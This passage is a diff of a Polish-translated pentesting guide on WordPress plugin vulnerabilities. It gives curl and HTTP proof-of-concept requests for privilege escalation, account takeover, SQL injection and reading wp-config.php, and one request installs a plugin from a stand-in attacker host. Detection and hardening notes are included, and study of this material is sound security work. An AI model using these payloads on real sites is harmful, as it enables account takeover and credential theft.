+* Any `add_action( 'wp_ajax_nopriv_...')` callback that calls filesystem helpers (`copy()`, `unlink()`, `$wp_filesystem->delete()`, etc.).
+* Concatenation of unsanitised user input into paths (look for `$_POST`, `$_GET`, `$_REQUEST`).
+* Absence of `check_ajax_referer()` and `current_user_can()`/`is_user_logged_in()`.
 
 ---
 
-### Eskalacja uprawnień przez przywracanie przestarzałych ról i brak autoryzacji (ASE "View Admin as Role")
+### Privilege escalation via stale role restoration and missing authorization (ASE "View Admin as Role")
 
-Wiele pluginów implementuje funkcję "view as role" lub tymczasowej zmiany roli poprzez zapisanie oryginalnej(ych) roli(i) w user meta, aby móc je przywrócić później. Jeśli ścieżka przywracania opiera się jedynie na parametrach żądania (np. `$_REQUEST['reset-for']`) i liście utrzymywanej przez wtyczkę bez sprawdzania uprawnień i ważnego nonce, staje się to wertykalną eskalacją uprawnień.
+Many plugins implement a "view as role" or temporary role-switching feature by saving the original role(s) in user meta so they can be restored later. If the restoration path relies only on request parameters (e.g., `$_REQUEST['reset-for']`) and a plugin-maintained list without checking capabilities and a valid nonce, this becomes a vertical privilege escalation.
 
-Przykład z rzeczywistego świata znaleziono we wtyczce Admin and Site Enhancements (ASE) (≤ 7.6.2.1). Gałąź resetu przywracała role na podstawie `reset-for=<username>` jeśli nazwa użytkownika pojawiła się w wewnętrznej tablicy `$options['viewing_admin_as_role_are']`, ale nie wykonywała ani sprawdzenia `current_user_can()` ani weryfikacji nonce przed usunięciem obecnych ról i ponownym dodaniem zapisanych ról z user meta `_asenha_view_admin_as_original_roles`:
+A real-world example was found in the Admin and Site Enhancements (ASE) plugin (≤ 7.6.2.1). The reset branch restored roles based on `reset-for=<username>` if the username appeared in an internal array `$options['viewing_admin_as_role_are']`, but performed neither a `current_user_can()` check nor a nonce verification before removing current roles and re-adding the saved roles from user meta `_asenha_view_admin_as_original_roles`:
 ```php
 // Simplified vulnerable pattern
 if ( isset( $_REQUEST['reset-for'] ) ) {
@@ -479,13 +479,13 @@ foreach ( $orig as $r ) { $u->add_role( $r ); }
 }
 }
 ```
-Dlaczego jest to eksploatowalne
+Dlaczego jest to podatne
 
 - Polega na zaufaniu do `$_REQUEST['reset-for']` i opcji wtyczki bez autoryzacji po stronie serwera.
-- Jeśli użytkownik wcześniej miał wyższe uprawnienia zapisane w `_asenha_view_admin_as_original_roles` i został zdegradowany, może je przywrócić, odwiedzając ścieżkę resetu.
+- Jeśli użytkownik wcześniej miał wyższe uprawnienia zapisane w `_asenha_view_admin_as_original_roles` i został zdegradowany, może je przywrócić, przechodząc na ścieżkę resetu.
 - W niektórych wdrożeniach każdy uwierzytelniony użytkownik mógł wywołać reset dla innej nazwy użytkownika nadal obecnej w `viewing_admin_as_role_are` (błędna autoryzacja).
 
-Exploitation (example)
+Eksploatacja (przykład)
 ```bash
 # While logged in as the downgraded user (or any auth user able to trigger the code path),
 # hit any route that executes the role-switcher logic and include the reset parameter.
@@ -493,23 +493,23 @@ Exploitation (example)
 curl -s -k -b 'wordpress_logged_in=...' \
 'https://victim.example/wp-admin/?reset-for=<your_username>'
 ```
-W podatnych buildach usuwa to bieżące role i ponownie dodaje zapisane oryginalne role (np. `administrator`), skutecznie eskalując uprawnienia.
+W podatnych wersjach usuwa to bieżące role i ponownie dodaje zapisane oryginalne role (np. `administrator`), efektywnie eskalując uprawnienia.
 
 Detection checklist
 
-- Szukaj funkcji przełączania ról, które zapisują „original roles” w user meta (np. `_asenha_view_admin_as_original_roles`).
+- Szukaj funkcji przełączania ról, które przechowują “oryginalne role” w user meta (np. `_asenha_view_admin_as_original_roles`).
 - Zidentyfikuj ścieżki reset/restore, które:
 - Odczytują nazwy użytkowników z `$_REQUEST` / `$_GET` / `$_POST`.
-- Modyfikują role za pomocą `add_role()` / `remove_role()` bez `current_user_can()` oraz `wp_verify_nonce()` / `check_admin_referer()`.
-- Autoryzują na podstawie tablicy opcji wtyczki (np. `viewing_admin_as_role_are`) zamiast na podstawie uprawnień aktora.
+- Modyfikują role przez `add_role()` / `remove_role()` bez `current_user_can()` i `wp_verify_nonce()` / `check_admin_referer()`.
+- Autoryzują na podstawie opcji pluginu (np. `viewing_admin_as_role_are`) zamiast uprawnień aktora.
 
 ---
 
-### Nieautoryzowana eskalacja uprawnień przez przełączanie użytkownika oparte na zaufanym ciasteczku na publicznym init (Service Finder “sf-booking”)
+### Eskalacja uprawnień bez uwierzytelnienia przez przełączanie użytkownika polegające na zaufaniu do cookie na publicznym hooku `init` (Service Finder “sf-booking”)
 
-Niektóre wtyczki podpinają helpery do user-switching pod publiczny hook `init` i pobierają tożsamość z ciasteczka kontrolowanego przez klienta. Jeśli kod wywołuje `wp_set_auth_cookie()` bez weryfikacji uwierzytelnienia, uprawnień i ważnego nonce, każdy nieautoryzowany odwiedzający może wymusić zalogowanie jako dowolny identyfikator użytkownika.
+Niektóre pluginy podłączają pomocniki przełączania użytkownika do publicznego hooka `init` i odczytują tożsamość z cookie kontrolowanego przez klienta. Jeśli kod wywołuje `wp_set_auth_cookie()` bez weryfikacji uwierzytelnienia, uprawnień i ważnego nonce, dowolny niezalogowany odwiedzający może wymusić logowanie jako dowolny identyfikator użytkownika.
 
-Typowy podatny wzorzec (uproszczone z Service Finder Bookings ≤ 6.1):
+Typowy podatny wzorzec (uproszczony z Service Finder Bookings ≤ 6.1):
 ```php
 function service_finder_submit_user_form(){
 if ( isset($_GET['switch_user']) && is_numeric($_GET['switch_user']) ) {
@@ -538,11 +538,11 @@ wp_die('Original user not found.');
 wp_die('No original user found to switch back to.');
 }
 ```
-Dlaczego jest to podatne
+Dlaczego jest podatne
 
 - Publiczny hook `init` sprawia, że handler jest dostępny dla niezalogowanych użytkowników (brak zabezpieczenia `is_user_logged_in()`).
-- Tożsamość jest odczytywana z cookie modyfikowalnego po stronie klienta (`original_user_id`).
-- Bezpośrednie wywołanie `wp_set_auth_cookie($uid)` loguje żądającego jako tego użytkownika bez jakichkolwiek sprawdzeń capability/nonce.
+- Tożsamość pochodzi z ciasteczka modyfikowalnego po stronie klienta (`original_user_id`).
+- Bezpośrednie wywołanie `wp_set_auth_cookie($uid)` loguje osobę wysyłającą żądanie jako tego użytkownika bez żadnych sprawdzeń uprawnień ani nonce.
 
 Eksploatacja (bez uwierzytelnienia)
 ```http
@@ -554,26 +554,26 @@ Connection: close
 ```
 ---
 
-### WAF considerations for WordPress/plugin CVEs
+### Rozważania dotyczące WAF dla WordPress/plugin CVEs
 
-Ogólne WAFy brzegowe/serwerowe są nastawione na wykrywanie szerokich wzorców (SQLi, XSS, LFI). Wiele wysokiego ryzyka luk w WordPress i wtyczkach to błędy logiki/autoryzacji specyficzne dla aplikacji, które wyglądają jak nieszkodliwy ruch, chyba że silnik rozumie trasy WordPress i semantykę wtyczek.
+Ogólne WAFy brzegowe/serwerowe są skonfigurowane pod kątem szerokich wzorców (SQLi, XSS, LFI). Wiele wysokowpływowych luk WordPress/plugin to błędy logiki/specyfiki aplikacji i autoryzacji, które wyglądają jak nieszkodliwy ruch, chyba że silnik rozumie trasy WordPress i semantykę pluginów.
 
 Offensive notes
 
-- Celuj w endpointy specyficzne dla wtyczek przy użyciu czystych payloadów: `admin-ajax.php?action=...`, `wp-json/<namespace>/<route>`, custom file handlers, shortcodes.
-- Najpierw testuj ścieżki nieautoryzowane (AJAX `nopriv`, REST z liberalnym `permission_callback`, public shortcodes). Domyślne payloady często działają bez obfuskacji.
-- Typowe przypadki o dużym wpływie: eskalacja uprawnień (broken access control), dowolne przesyłanie/pobieranie plików, LFI, open redirect.
+- Celuj w endpointy specyficzne dla pluginów z czystymi payloadami: `admin-ajax.php?action=...`, `wp-json/<namespace>/<route>`, custom file handlers, shortcodes.
+- Sprawdź najpierw ścieżki nieautoryzowane (AJAX `nopriv`, REST z permisywnym `permission_callback`, public shortcodes). Domyślne payloady często działają bez obfuskacji.
+- Typowe przypadki o wysokim wpływie: eskalacja uprawnień (zepsuta kontrola dostępu), dowolne przesyłanie/pobieranie plików, LFI, open redirect.
 
 Defensive notes
 
-- Nie polegaj na ogólnych sygnaturach WAF, aby chronić CVE dotyczące wtyczek. Wdroż wirtualne poprawki specyficzne dla podatności na warstwie aplikacji lub zaktualizuj szybko.
-- Preferuj mechanizmy pozytywnej ochrony w kodzie (capabilities, nonces, ścisła walidacja wejścia) zamiast negatywnych filtrów regex.
+- Nie polegaj na ogólnych sygnaturach WAF w celu ochrony plugin CVEs. Zaimplementuj łatki wirtualne specyficzne dla podatności na warstwie aplikacji lub szybko aktualizuj.
+- Preferuj podejście pozytywnej polityki bezpieczeństwa w kodzie (capabilities, nonces, ścisła walidacja wejścia) zamiast negatywnych filtrów regex.
 
-## Ochrona WordPress
+## WordPress Protection
 
-### Regularne aktualizacje
+### Regular Updates
 
-Upewnij się, że WordPress, wtyczki i motywy są aktualne. Potwierdź także, że automatyczne aktualizacje są włączone w wp-config.php:
+Upewnij się, że WordPress, pluginy i motywy są aktualne. Potwierdź także, że automatyczne aktualizacje są włączone w wp-config.php:
 ```bash
 define( 'WP_AUTO_UPDATE_CORE', true );
 add_filter( 'auto_update_plugin', '__return_true' );
@@ -596,9 +596,9 @@ Ponadto, **instaluj tylko zaufane wtyczki i motywy WordPress**.
 - Zmień nazwę pliku **`wp-admin.php`** i zezwalaj na dostęp tylko wewnętrznie lub z określonych adresów IP.
 
 
-### Nieuwierzytelniony SQL Injection z powodu niewystarczającej walidacji (WP Job Portal <= 2.3.2)
+### Unauthenticated SQL Injection via insufficient validation (WP Job Portal <= 2.3.2)
 
-Wtyczka rekrutacyjna WP Job Portal udostępniała zadanie **savecategory**, które ostatecznie wykonuje następujący podatny kod w `modules/category/model.php::validateFormData()`:
+The WP Job Portal recruitment plugin exposed a **savecategory** task that ultimately executes the following vulnerable code inside `modules/category/model.php::validateFormData()`:
 ```php
 $category  = WPJOBPORTALrequest::getVar('parentid');
 $inquery   = ' ';
@@ -610,9 +610,9 @@ $query  = "SELECT max(ordering)+1 AS maxordering FROM "
 ```
 Problemy wprowadzone przez ten fragment:
 
-1. **Unsanitised user input** – `parentid` pochodzi bezpośrednio z żądania HTTP.
-2. **String concatenation inside the WHERE clause** – brak użycia `is_numeric()` / `esc_sql()` / prepared statement.
-3. **Unauthenticated reachability** – chociaż akcja jest wykonywana przez `admin-post.php`, jedyną kontrolą jest **CSRF nonce** (`wp_verify_nonce()`), który każdy odwiedzający może pobrać ze strony publicznej osadzonej przy pomocy shortcode `[wpjobportal_my_resumes]`.
+1. **Niesanitizowane dane wejściowe użytkownika** – `parentid` pochodzi bezpośrednio z żądania HTTP.
+2. **Łączenie łańcuchów znaków w klauzuli WHERE** – brak `is_numeric()` / `esc_sql()` / prepared statement.
+3. **Dostęp bez uwierzytelnienia** – chociaż akcja wykonywana jest przez `admin-post.php`, jedyna kontrola to **CSRF nonce** (`wp_verify_nonce()`), który każdy odwiedzający może pobrać ze strony publicznej osadzającej shortcode `[wpjobportal_my_resumes]`.
 
 #### Wykorzystanie
 
@@ -620,7 +620,7 @@ Problemy wprowadzone przez ten fragment:
 ```bash
 curl -s https://victim.com/my-resumes/ | grep -oE 'name="_wpnonce" value="[a-f0-9]+' | cut -d'"' -f4
 ```
-2. Wstrzyknięcie dowolnego zapytania SQL przez nadużycie `parentid`:
+2. Wstrzyknij dowolne zapytanie SQL, wykorzystując `parentid`:
 ```bash
 curl -X POST https://victim.com/wp-admin/admin-post.php \
 -d 'task=savecategory' \
@@ -628,18 +628,18 @@ curl -X POST https://victim.com/wp-admin/admin-post.php \
 -d 'parentid=0 OR 1=1-- -' \
 -d 'cat_title=pwn' -d 'id='
 ```
-Odpowiedź ujawnia wynik wstrzykniętego zapytania lub modyfikuje bazę danych, potwierdzając SQLi.
+Odpowiedź ujawnia wynik wstrzykniętego zapytania lub modyfikuje bazę danych, co potwierdza SQLi.
 
 
-### Unauthenticated Arbitrary File Download / Path Traversal (WP Job Portal <= 2.3.2)
+### Nieautoryzowane pobieranie dowolnych plików / Path Traversal (WP Job Portal <= 2.3.2)
 
-Inne zadanie, **downloadcustomfile**, pozwalało odwiedzającym pobrać **dowolny plik na dysku** poprzez path traversal. Wrażliwy sink znajduje się w `modules/customfield/model.php::downloadCustomUploadedFile()`:
+Inna akcja, **downloadcustomfile**, pozwalała odwiedzającym pobrać **dowolny plik z dysku** poprzez path traversal. Wrażliwy punkt znajduje się w `modules/customfield/model.php::downloadCustomUploadedFile()`:
 ```php
 $file = $path . '/' . $file_name;
 ...
 echo $wp_filesystem->get_contents($file); // raw file output
 ```
-`$file_name` jest kontrolowany przez atakującego i konkatenowany **bez sanitacji**. Ponownie, jedyną barierą jest **CSRF nonce**, który można pobrać ze strony z CV.
+`$file_name` jest kontrolowany przez atakującego i konkatenowany **bez filtrowania**.  Ponownie, jedyną przeszkodą jest **CSRF nonce**, który można pobrać ze strony CV.
 
 #### Exploitation
 ```bash
@@ -652,11 +652,11 @@ curl -G https://victim.com/wp-admin/admin-post.php \
 ```
 Serwer zwraca zawartość `wp-config.php`, leaking DB credentials and auth keys.
 
-## Nieautoryzowane przejęcie konta przez Social Login AJAX fallback (Jobmonster Theme <= 4.7.9)
+## Unauthenticated account takeover via Social Login AJAX fallback (Jobmonster Theme <= 4.7.9)
 
-Wiele motywów/pluginów dostarcza "social login" helpery wystawione przez admin-ajax.php. Jeśli nieautoryzowana akcja AJAX (wp_ajax_nopriv_...) ufa identyfikatorom dostarczonym przez klienta, gdy brakuje danych providera, a następnie wywołuje wp_set_auth_cookie(), to staje się to pełnym obejściem uwierzytelniania.
+Wiele motywów/wtyczek dostarcza helpery "social login" udostępnione przez admin-ajax.php. Jeśli nieuwierzytelniona akcja AJAX (wp_ajax_nopriv_...) ufa identyfikatorom przesłanym przez klienta, gdy brak danych providera, a następnie wywołuje wp_set_auth_cookie(), to staje się to pełnym obejściem uwierzytelniania.
 
-Typowy błędny schemat (uproszczony)
+Typowy wadliwy wzorzec (uproszczony)
 ```php
 public function check_login() {
 // ... request parsing ...
@@ -685,17 +685,17 @@ wp_send_json(['status' => 'not_user']);
 }
 // add_action('wp_ajax_nopriv_<social_login_action>', [$this, 'check_login']);
 ```
-Dlaczego to jest eksploatowalne
+Dlaczego jest to podatne
 
-- Dostęp bez uwierzytelnienia przez admin-ajax.php (akcja wp_ajax_nopriv_…).
+- Unauthenticated reachability via admin-ajax.php (wp_ajax_nopriv_… action).
 - Brak sprawdzeń nonce/capability przed zmianą stanu.
-- Brak weryfikacji dostawcy OAuth/OpenID; gałąź domyślna akceptuje dane od atakującego.
-- get_user_by('email', $_POST['id']) z następującym wp_set_auth_cookie($uid) uwierzytelnia żądającego jako dowolny istniejący adres e-mail.
+- Brak weryfikacji OAuth/OpenID provider; gałąź domyślna akceptuje dane wejściowe od attacker.
+- get_user_by('email', $_POST['id']) followed by wp_set_auth_cookie($uid) powoduje uwierzytelnienie requestera jako dowolny istniejący adres e-mail.
 
-Eksploatacja (bez uwierzytelnienia)
+Wykorzystanie (unauthenticated)
 
-- Wymagania wstępne: atakujący może osiągnąć /wp-admin/admin-ajax.php i zna/zgaduje poprawny adres e-mail użytkownika.
-- Ustaw provider na nieobsługiwaną wartość (lub pomiń go), aby trafić do gałęzi domyślnej i przekazać id=<victim_email>.
+- Wymagania wstępne: attacker może dotrzeć do /wp-admin/admin-ajax.php i zna/zgaduje prawidłowy adres e-mail użytkownika.
+- Ustaw provider na nieobsługiwaną wartość (lub pomiń go), by trafić do gałęzi domyślnej i przekazać id=<victim_email>.
 ```http
 POST /wp-admin/admin-ajax.php HTTP/1.1
 Host: victim.tld
@@ -708,39 +708,39 @@ action=<vulnerable_social_login_action>&using=bogus&id=admin%40example.com
 curl -i -s -X POST https://victim.tld/wp-admin/admin-ajax.php \
 -d "action=<vulnerable_social_login_action>&using=bogus&id=admin%40example.com"
 ```
-Expected success indicators
+Oczekiwane wskaźniki powodzenia
 
-- HTTP 200 z ciałem JSON takim jak {"status":"success","message":"Login successfully."}.
-- Set-Cookie: wordpress_logged_in_* dla ofiary; kolejne żądania są uwierzytelnione.
+- HTTP 200 with JSON body like {"status":"success","message":"Login successfully."}.
+- Set-Cookie: wordpress_logged_in_* dla zaatakowanego użytkownika; kolejne żądania są uwierzytelnione.
 
-Finding the action name
+Znajdowanie nazwy akcji
 
-- Sprawdź motyw/wtyczkę pod kątem rejestracji add_action('wp_ajax_nopriv_...', '...') w kodzie social login (np. framework/add-ons/social-login/class-social-login.php).
-- Grep for wp_set_auth_cookie(), get_user_by('email', ...) inside AJAX handlers.
+- Przeanalizuj motyw/plugin pod kątem rejestracji add_action('wp_ajax_nopriv_...', '...') w kodzie social login (np. framework/add-ons/social-login/class-social-login.php).
+- Przeszukaj (grep) wystąpienia wp_set_auth_cookie(), get_user_by('email', ...) w handlerach AJAX.
 
-Detection checklist
+Lista kontrolna wykrywania
 
-- Logi serwera pokazujące niezautoryzowane żądania POST do /wp-admin/admin-ajax.php z akcją social-login i id=<email>.
-- Odpowiedzi 200 z JSON-em sukcesu bezpośrednio poprzedzające uwierzytelniony ruch z tego samego IP/User-Agent.
+- Logi webowe pokazujące nieautoryzowane POSTy do /wp-admin/admin-ajax.php z akcją social-login i id=<email>.
+- Odpowiedzi 200 z JSONem powodzenia bezpośrednio poprzedzające uwierzytelniony ruch z tego samego IP/User-Agent.
 
-Hardening
+Wzmocnienie zabezpieczeń
 
-- Nie wyprowadzaj tożsamości na podstawie danych przesłanych przez klienta. Akceptuj tylko adresy e-mail/ID pochodzące z zatwierdzonego tokena/ID dostawcy.
-- Wymagaj nonce CSRF i sprawdzeń uprawnień nawet dla helperów logowania; unikaj rejestrowania wp_ajax_nopriv_ chyba że jest to absolutnie konieczne.
-- Waliduj i weryfikuj odpowiedzi OAuth/OIDC po stronie serwera; odrzucaj brakujących/nieprawidłowych dostawców (bez fallbacku do POST id).
-- Rozważ tymczasowe wyłączenie social login lub wirtualne załatanie na edge (zablokowanie podatnej akcji) do czasu naprawy.
+- Nie wyprowadzaj tożsamości z danych od klienta. Akceptuj tylko adresy e-mail/ID pochodzące z zweryfikowanego provider token/ID.
+- Wymagaj CSRF nonces i sprawdzeń uprawnień nawet dla helperów logowania; unikaj rejestrowania wp_ajax_nopriv_ chyba że absolutnie konieczne.
+- Weryfikuj odpowiedzi OAuth/OIDC po stronie serwera; odrzucaj brakujących/nieprawidłowych providerów (bez fallbacku do POST id).
+- Rozważ tymczasowe wyłączenie social login lub wirtualne załatanie na krawędzi (zablokowanie podatnej akcji) do czasu naprawy.
 
-Patched behaviour (Jobmonster 4.8.0)
+Zachowanie po łacie (Jobmonster 4.8.0)
 
-- Usunięto niebezpieczny fallback oparty na $_POST['id']; $user_email musi pochodzić z gałęzi zweryfikowanego dostawcy w switch($_POST['using']).
+- Usunięto niebezpieczny fallback z $_POST['id']; $user_email musi pochodzić z zweryfikowanych gałęzi provider w switch($_POST['using']).
 
-## Unauthenticated privilege escalation via REST token/key minting on predictable identity (OttoKit/SureTriggers ≤ 1.0.82)
+## Nieautoryzowana eskalacja uprawnień przez wydawanie REST token/key na przewidywalnej tożsamości (OttoKit/SureTriggers ≤ 1.0.82)
 
-Niektóre wtyczki udostępniają endpointy REST, które tworzą wielokrotnego użytku “connection keys” lub tokeny bez weryfikacji uprawnień wywołującego. Jeśli trasa autoryzuje się jedynie na podstawie odgadniętego atrybutu (np. username) i nie wiąże klucza z użytkownikiem/sesją poprzez sprawdzenia uprawnień, każdy niezalogowany atakujący może wygenerować klucz i wywołać uprzywilejowane akcje (utworzenie konta admina, akcje wtyczki → RCE).
+Niektóre wtyczki udostępniają REST endpoints, które wydają wielokrotnego użytku “connection keys” lub tokeny bez weryfikacji uprawnień wywołującego. Jeśli route uwierzytelnia się jedynie na podstawie łatwego do odgadnięcia atrybutu (np. username) i nie powiązuje klucza z użytkownikiem/sesją poprzez sprawdzenia uprawnień, dowolny nieautoryzowany atakujący może wygenerować klucz i wywołać uprzywilejowane akcje (utworzenie konta admin, akcje wtyczki → RCE).
 
-- Vulnerable route (example): sure-triggers/v1/connection/create-wp-connection
-- Flaw: accepts a username, issues a connection key without current_user_can() or a strict permission_callback
-- Impact: full takeover by chaining the minted key to internal privileged actions
+- Podatna ścieżka (przykład): sure-triggers/v1/connection/create-wp-connection
+- Błąd: akceptuje username, wydaje connection key bez current_user_can() lub rygorystycznej permission_callback
+- Wpływ: pełne przejęcie poprzez powiązanie wygenerowanego klucza z wewnętrznymi uprzywilejowanymi akcjami
 
 PoC – wygeneruj connection key i użyj go
 ```bash
@@ -757,24 +757,24 @@ curl -s -X POST "https://victim.tld/wp-json/sure-triggers/v1/users" \
 --data '{"username":"pwn","email":"p@t.ld","password":"p@ss","role":"administrator"}'
 ```
 Dlaczego to jest podatne
-- Wrażliwa ścieżka REST chroniona jedynie przez dowód tożsamości o niskiej entropii (username) lub brakujący permission_callback
-- Brak egzekwowania capability; wygenerowany klucz jest akceptowany jako uniwersalny bypass
+- Wrażliwa REST route chroniona wyłącznie niską entropią potwierdzenia tożsamości (username) lub brakiem permission_callback
+- Brak egzekwowania capability; wygenerowany klucz jest akceptowany jako uniwersalne obejście
 
 Lista kontrolna wykrywania
-- Grep w kodzie wtyczki w poszukiwaniu register_rest_route(..., [ 'permission_callback' => '__return_true' ])
-- Każda ścieżka, która wydaje tokeny/klucze na podstawie tożsamości dostarczonej w żądaniu (username/email) bez powiązania z uwierzytelnionym użytkownikiem lub capability
-- Szukaj kolejnych ścieżek, które akceptują wygenerowany token/klucz bez serwerowego sprawdzenia capability
+- Przeszukaj kod pluginu pod kątem register_rest_route(..., [ 'permission_callback' => '__return_true' ])
+- Każda route, która wydaje tokens/keys na podstawie tożsamości podanej w żądaniu (username/email) bez powiązania z uwierzytelnionym użytkownikiem lub capability
+- Szukaj kolejnych route, które akceptują wygenerowany token/key bez sprawdzeń capability po stronie serwera
 
 Wzmocnienie
-- Dla każdej uprzywilejowanej ścieżki REST: wymagaj permission_callback, który egzekwuje current_user_can() dla wymaganej capability
-- Nie twórz długowiecznych kluczy na podstawie tożsamości dostarczonej przez klienta; jeśli to konieczne, wydawaj krótkotrwałe, powiązane z użytkownikiem tokeny po uwierzytelnieniu i ponownie sprawdzaj capability podczas użycia
-- Zwaliduj kontekst użytkownika wywołującego (wp_set_current_user nie jest wystarczające samo w sobie) i odrzucaj żądania, gdzie !is_user_logged_in() || !current_user_can(<cap>)
+- Dla każdej uprzywilejowanej REST route: wymagaj permission_callback, który wymusza current_user_can() dla wymaganej capability
+- Nie generuj długotrwałych kluczy na podstawie tożsamości dostarczonej przez klienta; jeśli konieczne, wydawaj krótkotrwałe, powiązane z użytkownikiem tokeny po uwierzytelnieniu i ponownie sprawdzaj capability przy użyciu
+- Waliduj kontekst użytkownika wywołującego (wp_set_current_user nie jest wystarczające samo w sobie) i odrzucaj żądania, gdzie !is_user_logged_in() || !current_user_can(<cap>)
 
 ---
 
-## Nonce gate misuse → unauthenticated arbitrary plugin installation (FunnelKit Automations ≤ 3.5.3)
+## Nonce gate misuse → instalacja dowolnego pluginu bez uwierzytelnienia (FunnelKit Automations ≤ 3.5.3)
 
-Nonces zapobiegają CSRF, nie autoryzacji. Jeśli kod traktuje pozytywne przejście nonce jako zielone światło i następnie pomija sprawdzenia capability dla operacji uprzywilejowanych (np. install/activate plugins), niezalogowani atakujący mogą spełnić słabe wymaganie nonce i osiągnąć RCE przez zainstalowanie backdoored or vulnerable plugin.
+Nonces zapobiegają CSRF, nie autoryzacji. Jeśli kod traktuje pomyślne sprawdzenie nonce jako zielone światło i pomija sprawdzenia capability dla uprzywilejowanych operacji (np. install/activate plugins), nieuwierzytelnieni atakujący mogą spełnić słabe wymaganie nonce i osiągnąć RCE przez zainstalowanie backdoored lub vulnerable plugin.
 
 - Vulnerable path: plugin/install_and_activate
 - Flaw: weak nonce hash check; no current_user_can('install_plugins'|'activate_plugins') once nonce “passes”
@@ -786,24 +786,24 @@ curl -i -s -X POST https://victim.tld/wp-json/<fk-namespace>/plugin/install_and_
 -H 'Content-Type: application/json' \
 --data '{"_nonce":"<weak-pass>","slug":"hello-dolly","source":"https://attacker.tld/mal.zip"}'
 ```
-Detection checklist
-- REST/AJAX handlers modyfikujące wtyczki/motywy używające jedynie wp_verify_nonce()/check_admin_referer() i bez sprawdzenia uprawnień
+Lista kontrolna wykrywania
+- REST/AJAX handlers that modify plugins/themes with only wp_verify_nonce()/check_admin_referer() and no capability check
 - Każda ścieżka kodu, która ustawia $skip_caps = true po walidacji nonce
 
-Hardening
-- Zawsze traktuj nonces wyłącznie jako tokeny CSRF; wymuszaj sprawdzenia uprawnień niezależnie od stanu nonce
-- Wymagaj current_user_can('install_plugins') oraz current_user_can('activate_plugins') przed dotarciem do kodu instalatora
-- Odrzucaj nieuwierzytelniony dostęp; unikaj udostępniania nopriv AJAX actions dla uprzywilejowanych przepływów
+Wzmocnienie
+- Zawsze traktuj nonce jako tokeny CSRF tylko; wymuszaj sprawdzenia uprawnień niezależnie od stanu nonce
+- Wymagaj current_user_can('install_plugins') i current_user_can('activate_plugins') przed dotarciem do kodu instalatora
+- Odrzucaj dostęp bez uwierzytelnienia; unikaj ujawniania nopriv AJAX actions dla uprzywilejowanych przepływów
 
 ---
 
-## Niezalogowany SQLi via s search parameter in depicter-* actions (Depicter Slider ≤ 3.6.1)
+## SQLi bez uwierzytelnienia przez parametr s (search) w akcjach depicter-* (Depicter Slider ≤ 3.6.1)
 
-Wiele akcji depicter-* wykorzystywało parametr s (search) i konkatenowało go w zapytaniach SQL bez parametryzacji.
+Wiele akcji depicter-* pobierało parametr s (search) i konkatenowało go do zapytań SQL bez parametryzacji.
 
-- Parameter: s (search)
-- Flaw: bezpośrednia konkatenacja łańcuchów w klauzulach WHERE/LIKE; brak użycia zapytań przygotowanych i sanitizacji
-- Impact: eksfiltracja bazy danych (użytkownicy, hashe), lateral movement
+- Parametr: s (search)
+- Błąd: bezpośrednie konkatenowanie łańcuchów w klauzulach WHERE/LIKE; brak zapytań przygotowanych i sanitizacji
+- Wpływ: eksfiltracja bazy danych (użytkownicy, hashe), lateral movement
 
 PoC
 ```bash
@@ -813,37 +813,37 @@ curl -G "https://victim.tld/wp-admin/admin-ajax.php" \
 --data-urlencode "s=' UNION SELECT user_login,user_pass FROM wp_users-- -"
 ```
 Detection checklist
-- Przeszukaj (grep) depicter-* action handlers oraz bezpośrednie użycie $_GET['s'] lub $_POST['s'] w SQL
-- Przejrzyj niestandardowe zapytania przekazywane do $wpdb->get_results()/query(), łączące s
+- Grepuj depicter-* action handlers oraz bezpośrednie użycie $_GET['s'] lub $_POST['s'] w zapytaniach SQL
+- Przejrzyj niestandardowe zapytania przekazywane do $wpdb->get_results()/query() łączące parametr s
 
 Hardening
 - Zawsze używaj $wpdb->prepare() lub wpdb placeholders; odrzucaj nieoczekiwane metaznaki po stronie serwera
-- Dodaj ścisłą białą listę dla s i normalizuj do oczekiwanego zestawu znaków/długości
+- Dodaj ścisłą allowlistę dla s i normalizuj do oczekiwanego charset/length
 
 ---
 
-## Unauthenticated Local File Inclusion via niezwalidowanej ścieżki szablonu/pliku (Kubio AI Page Builder ≤ 2.5.1)
+## Local File Inclusion bez uwierzytelnienia przez niezwalidowaną ścieżkę szablonu/pliku (Kubio AI Page Builder ≤ 2.5.1)
 
-Akceptowanie ścieżek kontrolowanych przez atakującego w parametrze template bez normalizacji/izolacji pozwala na odczyt dowolnych lokalnych plików, a czasami na wykonanie kodu, jeśli pliki PHP/log możliwe do include zostaną załadowane w czasie wykonywania.
+Akceptowanie ścieżek kontrolowanych przez atakującego w parametrze szablonu bez normalizacji/ograniczenia pozwala na odczyt dowolnych lokalnych plików, a czasem wykonanie kodu jeśli includowalne pliki PHP/logi zostaną załadowane do runtime.
 
 - Parameter: __kubio-site-edit-iframe-classic-template
-- Flaw: brak normalizacji/białej listy; traversal permitted
-- Impact: ujawnienie sekretów (wp-config.php), potencjalne RCE w określonych środowiskach (log poisoning, includable PHP)
+- Flaw: brak normalizacji/allowlisty; path traversal dozwolony
+- Impact: ujawnienie sekretów (wp-config.php), potencjalne RCE w specyficznych środowiskach (log poisoning, includable PHP)
 
-PoC – read wp-config.php
+PoC – odczyt wp-config.php
 ```bash
 curl -i "https://victim.tld/?__kubio-site-edit-iframe-classic-template=../../../../wp-config.php"
 ```
 Lista kontrolna wykrywania
-- Każdy handler łączący ścieżki żądań i przekazujący je do include()/require()/read sinks bez kontroli za pomocą realpath()
-- Szukaj wzorców traversal (../), które prowadzą poza zamierzony katalog szablonów
+- Każdy handler łączący ścieżki żądań w include()/require()/read sinks bez ograniczenia przez realpath()
+- Szukaj wzorców traversal (../) wychodzących poza zamierzony katalog templates
 
-Wzmocnienie zabezpieczeń
-- Wymuś listę dozwolonych (allowlisted) szablonów; rozwiąż ścieżki przez realpath() i sprawdź str_starts_with(realpath(file), realpath(allowed_base))
+Wzmocnienie
+- Wymuszaj szablony z allowlisty; rozwiąż ścieżki za pomocą realpath() i wymagaj str_starts_with(realpath(file), realpath(allowed_base))
 - Normalizuj wejście; odrzucaj sekwencje traversal i ścieżki bezwzględne; używaj sanitize_file_name() tylko dla nazw plików (nie pełnych ścieżek)
 
 
-## Źródła
+## References
 
 - [Unauthenticated Arbitrary File Deletion Vulnerability in Litho Theme](https://patchstack.com/articles/unauthenticated-arbitrary-file-delete-vulnerability-in-litho-the/)
 - [Multiple Critical Vulnerabilities Patched in WP Job Portal Plugin](https://patchstack.com/articles/multiple-critical-vulnerabilities-patched-in-wp-job-portal-plugin/)
diff --git a/src/pentesting-web/command-injection.md b/src/pentesting-web/command-injection.md
index dcaf6d667..14e4cfed2 100644
--- a/src/pentesting-web/command-injection.md
